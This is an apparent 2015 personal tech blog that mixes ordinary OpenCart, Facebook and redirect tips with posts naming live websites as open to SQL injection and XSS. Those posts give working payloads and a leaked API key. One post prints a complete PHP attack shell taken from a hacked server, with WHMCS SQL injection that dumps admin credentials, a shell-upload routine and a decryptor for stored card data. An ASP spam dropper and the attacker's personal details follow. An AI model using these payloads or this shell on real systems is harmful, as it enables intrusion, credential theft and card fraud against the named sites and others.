Saturday, 29 August 2015

Mass move your categories in another store (id) in opencart

 With this simple sql query we are going to add, in an easy and fast way, the categories in another store

INSERT into `oc_category_to_store` (category_id, store_id) SELECT category_id, 0 from oc_category;

Replace the 0 (zero) with the id of the other store(id).

Thursday, 27 August 2015

Problem with facebook business page that cannot be shown on mobile - cannot search facebook page via smartphone

Problem with facebook business page that cannot be shown on mobile - cannot search facebook page via smartphone


Facebook business page cannot be found on facebook mobile from any kind of mobile device.


You can try:

- to contact the facebook's customer care ... that doesn't reply too often.

- to unpublish (hide) and publish your facebook page. This method works for pages that cannot be reached at all (desktop and mobile).

- Merge eventual duplicate facebook business pages. Maybe the problem is that only one will show in the searches.

- make sure to configure/assign the definitive facebook web address from the page settings.


Those are NOT definitive solutions!



Problema pagina facebook business non presente da mobile - impossibile cercarla da telefono


Una pagina facebook business non viene trovata nelle ricerche da mobile e non è possibile accedere da qualsiasi telefono


Potete provare a:

- a contattare assistenza facebook ... che non risponde spesso.

- a nascondere e ripubblicare la pagina. Il metodo funziona(va) per pagine che non si vedono da desktop e mobile.

- a Unire eventuali pagine business doppione. Una si vede e l'altra no.

- assicuratevi di aver impostato l'indirizzo facebook per la pagina.


Non sono soluzioni sicure ma sono le ipotesi che ho potuto fare quando si è posto tale problema!

Wednesday, 26 August 2015

http://www.instat.gov.al | possible Sql injection, data leak, data dump

http://www.instat.gov.al/al/figures/statistical-databases/select.aspx?rxid=1df185c6-c85e-4c8d-b7ae-d400ecedf852&px_tableid=LSMS51

LSMS51 seems to be the table and we can inject sql/data queries.

http://www.akp.gov.al/ | joomla 1.7 with bugs

http://www.akp.gov.al/ | joomla 1.7 with bugs

www.qkr.gov.al | XSS

sample:
www.qkr.gov.al/nrc/SearchPage.aspx?find=search:"><script>alert(1);</script><"&t=3

Thursday, 20 August 2015

http://www.domaindirect.it/ | sql injection, data dump, XSS

http://www.domaindirect.it/cat/tre%20lettere/page=XXX

It's possible to create a sql injection in several parts of the website.

the php website is using Zend


XSS
www.domaindirect.it/search/"><script>alert(1);</script>

http://www.martialart.it | sys compromise, path disclosure, etc

path: /web/htdocs/www.martialart.it/home/firedragon/

 api flickr 5975c197350037e77999ef112ec76cbe

Sunday, 16 August 2015

https://www.msweb2000.ca/ | sql injection at login

https://www.msweb2000.ca/ | sql injection at login

admin
a' or 1=1 --'

Wednesday, 12 August 2015

newshell.it | sql injections, system compromise, plesk remote exploit

https://newshell.it/index.php?action=utente&utenteAction=login

Sql injection in the login area

__________________________

https://mac.newshell.it:8443


https://xen1001.newshell.it:8443/
https://www.registrazionedomini.in:8443/
plesk + apache - remote exploit problem

Saturday, 8 August 2015

Best SEO practice to redirect a domain to your own

Use a php page (index.php) with a 301 Moved Permanently

<?php
// 301 Moved Permanently
header("Location: http://www.bnit.it",TRUE,301);

?>

Friday, 7 August 2015

php shell found on a hacked server

php shell found on a hacked server

andriroot@gmail.com is the email of the attacker. He's known as andri Cyber4rt, he's from jakarta,
he usually use the same email for frauds, he usually abuses of old bugs of whcms, plesk and so on.
His alt. email address is andri.cyber4rt@gmail.com.


 if(strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
function printLogin(){
echo "<html><head><title>./DM ExploiterZ [ 0day ]</title>
<style>body {font-family: 'Audiowide',serif;font-size: 20px;} </style></head>
<body bgcolor=black><center><br><br>
<nobr><font face=Audiowide color=blue>ExploiterZ <font color=white>[ 0day ]</font></nobr><br><br>
<form method=post>
<img src='https://fbcdn-photos-c-a.akamaihd.net/hphotos-ak-ash3/t1/994064_479867415465112_1199170647_n.jpg'><br><br>
:: Password :: <br><br>
<input size=30 style='color:blue;background-color:#000000' type='password' name='pass'>
<input style='color:blue;background-color:#000000' type=submit value=' Login Cuk '></font></form><br><br>";
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])] )) {
if(empty($auth_pass) || (isset( $_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
printLogin();
}
}
set_time_limit(0);
error_reporting(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'andriroot@gmail.com'; # ganti dengan email kamu

$error[] = 'You have an error in your SQL';
$error[] = 'supplied argument is not a valid MySQL result resource in';
$error[] = 'Division by zero in';
$error[] = 'Call to a member function';
$error[] = 'Microsoft JET Database';
$error[] = 'ODBC Microsoft Access Driver';
$error[] = 'Microsoft OLE DB Provider for SQL Server';
$error[] = 'Unclosed quotation mark';
$error[] = 'Microsoft OLE DB Provider for Oracle';
$error[] = 'Incorrect syntax near';
$error[] = 'SQL query failed';

function cut($start,$end,$top){
$c =strlen($start);
$desc= strstr("$top","$start");
$count = strpos("$desc","$end");
$desc = substr($desc,$c,$count-$c);
return $desc;
}

function tengah($string, $awal, $akhir){
$string = " ".$string;
$strings = strpos($string,$awal);
if ($strings == 0) return "";
$strings += strlen($awal);
$antara = strpos($string,$akhir,$strings) - $strings;
return substr($string,$strings,$antara);
}

function konek($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}

function filter($string){
if(get_magic_quotes_gpc() != 0){
return stripslashes($string);
} else {
return $string;
}
}


function letItBy(){
ob_flush();
flush();
}

function getAlexa($url){
$xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
$rank1 = $xml->SD[1];
if($rank1)
$rank = $rank1->POPULARITY->attributes()->TEXT;
else
$rank = 0;
return $rank;
}


function google($query, $page=1){
$resultPerPage=8;
$start = $page*$resultPerPage;
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=en&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
}
else
die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}

function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close();
}

function hajar($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}

function hack1($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,roleid,0x3a,username,0x3a,email,0x3a3a3a3a3a) FROM tbladmins ORDER BY id ASC),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}

function hack2($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,password,0x3a3a3a3a3a) FROM tbladmins ORDER BY id ASC),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}


function dm($url,$injection){
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,($injection),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?)::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}else{
return "Fail!";
}
}else{
return "Fail!";
}
}

function get_base_dir($URL) {
$URL = str_replace("http://","",$URL);
$URL = str_replace("https://","",$URL);
$parts = explode('/',$URL);
$newURL = "http://";
for ($i = 0; $i < count($parts); $i++) {
if(strpos($parts[$i],'.php') == false)
$newURL .= $parts[$i] . "/";
}
return $newURL;
}
 
function vb_vuln($URL) {
$URL = str_replace("http://","",$URL);
$URL = str_replace("https://","",$URL);
$URL = str_replace(".php","",$URL);
$xURL = explode("/",$URL);
$count = 0;
foreach ($xURL as $dir) {
if($count != 0)
$URL = $URL . $dir . "/";
else $URL = $dir;
$source = "";
$arr = parse_url('http://' . $URL);
if(strpos($URL, '?')) return 'EOF';
if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
if(!$arr['scheme']) $URL = 'http://' . $URL;
$headers = get_headers('http://' . str_replace("//","/",$URL . '/install/upgrade.php'));
if(substr($headers[0], 9, 3) == '200') {
$source = file_get_contents('http://' . str_replace("//","/",$URL . '/install/upgrade.php'));
GLOBAL $victimURL;
$victimURL = $URL . "/install/upgrade.php";
if(strpos($source,'Begin Upgrade') != false)
return "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
}
elseif($headers = get_headers('http://' . str_replace("//","/",$URL . '/core/install/upgrade.php'))) {
if((substr($headers[0], 9, 3) == '200' || substr($headers[0], 9, 3) == '302') && substr($headers[7], 9, 3) != '404') {
$source = file_get_contents('http://' . str_replace("//","/",$URL . '/core/install/upgrade.php'));
GLOBAL $victimURL;
$victimURL = $URL . "/core/install/upgrade.php";
if(strpos($source,'Begin Upgrade') != false)
return "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
}
}
$hash ="";
preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
if(strlen($hash) == 32)
return $hash;
}
preg_match_all('|var CUSTNUMBER="(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
if(strlen($hash) == 32)
return $hash;
}
$count++;
}
}

function check_injection($url){
$data = http_get( str_replace("=", "='", $url) );
$errors = implode("|", $GLOBALS['error']);
return preg_match("#{$errors}#i", $data);
}

function req($url,$fields){
$opts = array(
CURLOPT_HEADER =>1,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => 'http://www.sms-online.web.id/'.$url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $fields,
);
$ch=curl_init();
curl_setopt_array($ch,$opts);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}

function fc_vuln($url) {
$shell = dirname($url) . '/temp/ganteng.php';
$url = dirname($url) . '/upload.php';
$postFields = array();
$filePath = "/home/cpdebx/public_html/fc/ganteng.php";
$postFields['file'] = "@$filePath";
$curl_handle = curl_init();
curl_setopt($curl_handle, CURLOPT_URL, $url);
curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_handle, CURLOPT_POST, true);
curl_setopt($curl_handle, CURLOPT_POSTFIELDS, $postFields);
$result = curl_exec($curl_handle);
curl_close($curl_handle);
if(strpos($result,"@ganteng.php") != false)
return $shell;
else
return "Fail!";
}

function inject($url,$anu){
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,($anu),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?)::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}else{
return "Fail!";
}
}else{
return "Fail!";
}
}

function dec($string,$cc_encryption_hash){
$key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
$hash_key = _hash($key);
$hash_length = strlen($hash_key);
$string = base64_decode($string);
$tmp_iv = substr($string,0,$hash_length);
$string = substr($string,$hash_length,strlen ($string) - $hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length){
$iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen($string)){
if(($c != 0 AND $c % $hash_length == 0)){
$key = _hash($key . substr($out,$c - $hash_length,$hash_length));
}
$out .= chr(ord($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}
return $out;
}
function _hash($string){
$hash = (function_exists('sha1')) ? sha1($string):md5($string);
$out = '';
$c = 0;
while ($c < strlen($hash)){
$out .= chr(hexdec($hash[$c] .$hash[$c + 1]));
$c += 2;
}
return $out;
}

useless asp stuff found on an hacked server

useless asp  stuff found on an hacked server

<%
if request.QueryString("1")<>2 then
response.Write "<iframe src=""http://127.0.0.1"" width=100% height=100% frameborder=0></iframe>"
response.End()
end if
%>
<%
if request.Form("c")<>"" then
randomize
shuliang=Int((10000000 - 1 + 10000000) * Rnd + 1)
title=Replace(request.Form("title")," ","-")
path1=replace(server.mappath("1.asp"),"1.asp","")
path=path1&title&"-"&shuliang&".html"
dbfile=path1&"1.htm"
response.Write path&"<br>"
response.Write dbfile&"<br>"
str1=Replace(request.Form("c"),"<br><","<")&"</body></html>"
str2="<a href="&title&"-"&shuliang&".html"">"&request.Form("title")&"</a>"
response.Write str1&"<br>"
response.Write str2&"<br>"
set myfso = Server.CreateObject("Scripting.FileSystemObject")
set myfile1 = myfso.CreateTextFile(path,true)
set myfile2 = myfso.CreateTextFile(dbfile,true)
        myfile1.WriteLine(str1)
        myfile1.close
            myfile2.WriteLine(str2)
        myfile2.close
        set myfso = nothing

response.Write "<font color=red>Good Luck!</font>"
end if
%>
<title>MS</title>
SD
<form action="" method="post">
  <input type="text" size=48 name="title" value='' />
  <input type="submit" id="b" value="J8"><br>
<textarea name="c" cols=60 rows=9></textarea>
</form>
<p></p>

Twitter Delicious Facebook Digg Stumbleupon Favorites More